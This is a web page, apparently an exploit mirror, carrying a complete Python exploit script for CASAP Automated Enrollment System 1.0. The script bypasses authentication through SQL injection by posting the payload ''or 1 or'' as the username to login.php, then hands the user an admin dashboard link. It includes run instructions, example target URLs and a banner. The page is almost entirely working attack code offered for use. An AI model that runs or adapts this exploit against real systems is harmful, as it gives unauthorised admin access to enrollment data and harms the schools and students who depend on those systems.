扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 |
# Exploit Title: CASAP Automated Enrollment System 1.0 - Authentication Bypass # Exploit Author: Himanshu Shukla # Date: 2021-01-21 # Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip # Version: 1.0 # Tested On: Ubuntu + XAMPP 7.4.4 # Description: CASAP Automated Enrollment System 1.0 - Authentication Bypass Using SQLi #STEP 1 : Run The Exploit With This Command : python3 exploit.py <URL> # For Example: python3 exploit.py http://10.9.67.23/final/ #STEP 2 : Open the Link Provided At The End After Successful Authentication Bypass in Browser. import time import sys import requests YELLOW ='\033[33m' # Yellow Text GREEN ='\033[32m' # Green Text RED ='\033[31m' # Red Text RESET = '\033[m' # reset to the defaults print(YELLOW+'________ ____ ', RESET) print(YELLOW+'___| |_ ___ / / ___|| |__ __ ___| |/ _ \____', RESET) print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _<code> |/ _</code> | | | \ \ /\ / /", RESET) print(YELLOW+'|__/ || (__ / /___) | | | | (_| | (_| | |_| |\ VV / ', RESET) print(YELLOW+' \___|\__\___/_/|____/|_| |_|\__,_|\__,_|\___/\_/\_/', RESET) print(YELLOW+" ", RESET) print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!') print('!!! CASAP AUTOMATED ENROLLMENT SYSTEM 1.0!!!') print('!!! AUTHENTICATION BYPASS!!!') print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!') print('Author - Himanshu Shukla') def authbypass(url): #Authentication Bypass s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'} print ("[*]Attempting Authentication Bypass...") time.sleep(1) values = {"username":"'or 1 or'","password":""} r=s.post(url+'login.php', data=values, cookies=cookies) p=s.get(url+'dashboard.php', cookies=cookies) #Check if Authentication was bypassed or not. logged_in = True if ("true_admin" in r.text) else False l=logged_in if l: print(GREEN+"[+]Authentication Bypass Successful!", RESET) print(YELLOW+"[+]Open This Link To Continue As Admin : "+url+"dashboard.php", RESET) else: print(RED+"[-]Failed To Authenticate!", RESET) print(RED+"[-]Check Your URL", RESET) if __name__ == "__main__": if len(sys.argv)!=2: print(RED+"You Haven't Provided any URL!", RESET) print("Usage : python3 exploit.py <URL>") print("Example : python3 exploit.py http://10.9.7.3/final/") exit() try: authbypass(sys.argv[1]) except: print(RED+"[-]Invalid URL!", RESET) exit() |
体验盒子
